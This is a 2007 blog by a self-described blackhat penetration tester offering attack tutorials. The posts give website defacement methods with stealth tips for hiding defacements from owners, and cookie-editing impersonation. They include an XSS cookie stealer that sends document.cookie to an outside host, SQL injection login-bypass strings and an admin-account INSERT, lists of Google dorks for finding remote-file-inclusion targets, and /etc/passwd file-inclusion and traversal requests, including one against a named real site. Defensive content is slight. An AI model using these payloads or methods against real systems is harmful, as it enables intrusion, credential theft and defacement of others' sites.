what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Saturday, June 30, 2007

DEFACING SITES [Methods]


Method 1 - Content replacement.

Using the existing server host, web server etc, replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and replace original ones.

Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.

Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.

Method 4- Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.

For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.

Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.

Method 6 - DNS hijacking.
compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.

Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).

Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced

Method 9 - ISP compromise.
Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.

Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.

A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.

All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.

Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.

Be Protected Methods.

Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.

Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep

Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.

Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them)


/Chuks

Credits to my fellow friend, MuRd3rp0L!c3

Friday, June 22, 2007

AN ATTACK WITH CROSS SITE SCRIPTING

CROSS SITE SCRIPTING ATTACKS


Well, this is a simple example of an XSS vulnerable site. Its displays my cookie when i initiate document.cookie. If u know what i mean by cookies, then u will understand that, u can edit cookies too. Lets explain more on this below. Note, no beef with the site owners, just an example.

For some months i have been studing more on Cross Site Script (XSS) and i think i need to post this. I posted a zero day XSS scanner some time last week, if u didn't get a glimpse of it, i can always do that later.


ABOUT THE SCANNER


-Well that scanner, should get y
ou going when looking for Targets u wonna work out this weekend. Using Google Queries
is always the best way to hack with, we always say google is the best teacher, and the best hack tool ever exposed to the public, that is more than 60% accurate.

I'm not the author of code, its done by a good friend, i spend time with google, so i dont need a code to pick XSS vulnerable sites.

Anyway for starters, its good to know how to use tools before u get all blackhat and start picking targets with google or mouse pointer
s, hehehe.......... I'm Blackhat, i do alot underground stuff, read the manifesto, but they will never get near me, since i leave no trace.

THE SCANNING PHOTOS

Lemmie upload some photos of what the scanners can do.












So we are going to discuss the following

a)
Cookie Stealing
b) Javascript Injection
c) Xss in general and how to apply the attack

What Is a Cookie?

A cookie is a sensitive piece of data. You see once you go to a site and sign up a cookie is set to remember you. A cookie just holds data that the site can check that you have and see if youve been there before, if you have then it checks to see if the user and password are correct then logs you in. Picture your at a night club and you buy a ticket and they give you a band. So you can go in and out (so you dont have to rebuy a tickey) Cookies go much farther then that as you can see. Night Clubs remember you for one night. Cookies can remember you for ever.

Alerting & Spoofing

So you know what a cookie is... now how to you see them? Actually cookie editing is one of the most simple method. You see as long as you have a browser you can view and edit cookies, just with basic JavaScript(JS) skills. Load up your browser and go to the site... login... nowtype javascript:alert(document.cookie) and you should see a user and password (which is yours) If you don't thats ok! Most sites now a days don't use cookies... but use sessions... Sorry sessions can't be edited (they can) but not like cookies, once you edit a cookie you can spoof yourself (username and password) Now let's begin to spoof... Ok say you alerted the cookie and saw something like this...

strusername=Chuks;strpassword=danger

Now say you know 'kenya' is a admin and you don't know his password... due to weak security you don't need a password javascript:void(document.cookie="strusername=kenya") Now type javascript:alert(document.cookie) !!! Heh welcome kenya That's pretty much all to Cookie Editing. Do more research on that, i aint doing it for u.

What Is XSS?

XSS, or CSS, whatever you perfer to call it, XSS (CSS) stands for Cross Site Scripting. Basically that means you inject script any kind, to make it do whatever you want... Depends what you inject will depend on the outcome. With XSS you can also steal input. Such as user names passwords and cookies. This will all be discussed so will many examples and this article should help you get creative with XSS.

With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You setup XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. Xss can also steal cookies. Cookies hold valuable Information such as user / passwords etc...

So there was this question, the file output that the stealer script picks and pastes at the evil server with the cookies, could there be a google dork, that can help search for these outputs? Good Question, right? Hehehehe..............



Cross site scripting seems to be the future of web attack and new techniques develop every day. Good read. Will edit more later, since this was written in a Hurry and i havent explained more on the attack too, so hold on, atleast i did an Introduction.

/Chuks






Tuesday, June 12, 2007

THE MOST USED METHODS TO PENETRATE A WEBSERVER.


* This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;
* This document was prepared for informational purposes only;
* This document can not be multiplied without the authors permission.

Respects to my friend, flow-flow, for the German paper on the same.


Hackers Manifesto
I am here to exploit, to learn how thinks work.I’ve always put questions and I have always seeked for more than two hours.My crime is one of coriousity, I exploit what you dream of I am over ambition and will. If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.
I’m in the underground for 5 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinite possibilities that it opens for a man.
You don’t know me ,so don’t judge me ! ONLY GOD can judge me !
If you feel something reading these lines, that means that I am talking to you, if not look away.
We have to help each other, hacking can not be defind ,hacking is a state of mind.
I thank all of you that helped and help me !
This is my manifesto !

The tutorial will be structured in two directions : vulnerabilities and fixing them.

A lot of people are making tutorials but they just talk , i am going to really explain a few methods as we go. I don’t consider myself a specialist but i know what i am talking about.

SQL-INJECTION

Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain access to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.
Building programes with SQL to manipulate the commands from the data base and so getting access.The most used is SQL login bypass,through which we inject in the login and password fields.

Example ‘ OR 1=1—
URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—
Other comands : admin’—
‘ OR 0=0—
“ OR=0—
OR 0=0—
‘ HI OR 1=1—
" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

We look for vulnerable sites with the following google-dorks :
”admin\login.asp”
”login.asp

How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.
At each change of the components it must be done a web security audit.
It has no sense for me to get in any more detailes. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.

SQL Injection table modification

Here’s what we are going to do.
We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.

At the username : ‘ HAVING 1=1
The error must contain a table name : user_member.id .
Then the injecting of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try :
‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--

Now if everything went well we shold be able to log in with :
-user : hacker
-password : hacked

REMOTE FILE INCLUSION

In this method what we actually what to do is upload a file ,a shell emulator on the web page, the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme, we will upload the emulator,getting access to the entire server.
This method is much more than this ,this is only a form of it so read further more and more tutorials.
Here is a couple of google-dorks to find vulnerable web sites :
: inurl :”index.php?page=”
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=

We test on : http://site.com/director_vulnerabil.php?=http://google.com ,if the page opens in google in the site frame then it is vulnerable.

LOCAL FILE INCLUSION

A code problem can have serious consequencies ,this method is similarily to CGI Exploitation. Lets say i have access the password folder from the UNIX server. Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! then great hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem ,the code that generates it and so on.
Here is an example of an error :


$page input is not satinized.



The content is crypted ,but you can try with the bruteforce method using a program such as Brutus, will publish a perl code soon.I searched for passwords of FTP accounts for instance.It depends on your luck to.

URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd

REMOTE ADMIN FILE DISCLOSURE

You try this more ‘blind’ in general because we don’t know for sure if it will work every time.
Remote Admin Password Disclosure,we try to acces folders from the inside.


URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted alot of examples on other sites where I have found some serious info like passwords and so on. Here it isn’t such a big deal.

CROSS SITE SCRIPTING

It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to really understand.
More exactly I’m going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : .The result is a alert window with the text “xss”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.
After we test it like so : script>alert(‘XSS’) we do the following:
window.location=’http://site.com/carie.php?cookie=’+’document.cookie;

NULL BYTE-CGI EXPLOITATION

CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :
Index.cgi?pageid=2
Here page2.html is shown but if we modify a little like so :
Index.cgi?pageid.cgi%00
We just added NULL byte and it comes to the end all the data in the URL. Now we do the following scheme :
Index.cgi?pageid=/etc/passwd%00

Almost seems like LFI.


DIRECTORY TRANSVERSAL

Directory Transversal is an HTTP exploit and it allows the attacker to access folders from the inside the server and to execute commands from the server’s root.

· Access Control Lists (ACLs)
· Root directory
These are two security protocols used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. Root directory stops users to access files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value
=../../../../../Windows/system.ini .
../ represents the director we go one folder up.
Another scheme would be : http:/site.com/scripts/..%5c../Windows/System32/


Hope this helps all of you, its an easy into to Web Application Security.

See u soon,

/Chuks









Thursday, June 07, 2007

PHOTOS FOR THE CEH, FIVE MODULE TRAINING

Well, i had promised i will upload the videos for the conference done a little while, but, i will have to postpone that to next week. Today i will upload the some photos for the classes, i trained on CEH. Well, none of the photos i am displayed, so dont look for me, hehehehe.......


1.One of the students tries to get a glimpse of what is going on when a shell pops up.


2.Some of the students who attended.

That all for now,

Cheers



/Chuks

Wednesday, June 06, 2007

CHUKSFIRE SQL INJECTION TOOL

I have been busy scripting a tool that can crawl servers looking for Vulnerable pages which can be exploited using sql-injection. Its written in perl, called chuksfire. I will be lauching it soon, i will not name the day. I'm still working on the code, but its at its BETA stage at the moment. Been busy training, thats why its not out yet. I will try probe wananchi.co.ke, i will not display the vulnerable lines, though, but one thing u need to know, sql injection, can get your network compromised. This is how it works:

Starting chuksfire scan...

[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26
[*] Checking robots.txt...
[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...
[*] Checking index.php...
[*] Checking for possible bugs...



I will try see if, i can add up some CMS bugs in the code, so as to pick known sql-injection vulnerabilities, on well used CMSs, like Joomla, XOOPS and others.

Good reading.

/Chuks

HACKERS CODE

The Code

  1. Hackers share and are willing to teach their knowledge
  2. Hackers are skilled. Many are self-taught, or learn by interacting with other hackers.
  3. Hackers seek knowledge. This knowledge may come from unauthorized or unusual sources, and is often hidden.
  4. Hackers are tinkerers. They like to understand how things work, and want to make their own improvements or modifications.
  5. Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with.
  6. Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another.
  7. Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.
  8. This Code is not to prescribe how hackers act. Instead, it is to help us to recognize our own diversity and identify.
  9. Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals.
  10. Hackers' motivations are their own, and there is no reason for all hackers to agree.
  11. Hackers have a shared identify, however, and many shared interests.
  12. By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.

See u soon in Hack Dejavu, this Saturday for VIP at my security forum/mailist, the same spot, Igundas Place.

Good day.

/Chuks

Saturday, June 02, 2007

THE IT SECURITY CONFRENCE ARRANGED BY FUTURISTIC

Hi.

As most of u already know, we had the first, IT security Confrence in Kenya at Mid last month. Though we didnt cover much as expected, but hope we did a good show, and people got introduced to I.T. Security and got learn how to use a small holes to compromise the whole Server or Host.

I'm sure most of u got amazed when i used a tool like metasploit and got hold the desktop of someone who is logged in. Actually, hacking with metasploit and seizing up desktops, is not so leet, mostly there are more complicated hacking styles, where u install a good connect back and no one will know u are connected or logged in. By that we use Backdoors or Rootkits. I demostrated how to use Remote File Inclusion and how to find it, in vulnerable sites, and thats where jaws dropped since you could browse the system files for the victim. "Are we already in someones Server" u would ask.

Anyway hope to meet you for the upcoming CEH full course, which i will personnally train, and we will go through the 22 modules.

Hope to see u soon, i will post up at my forum.

Good Read.

/Chuks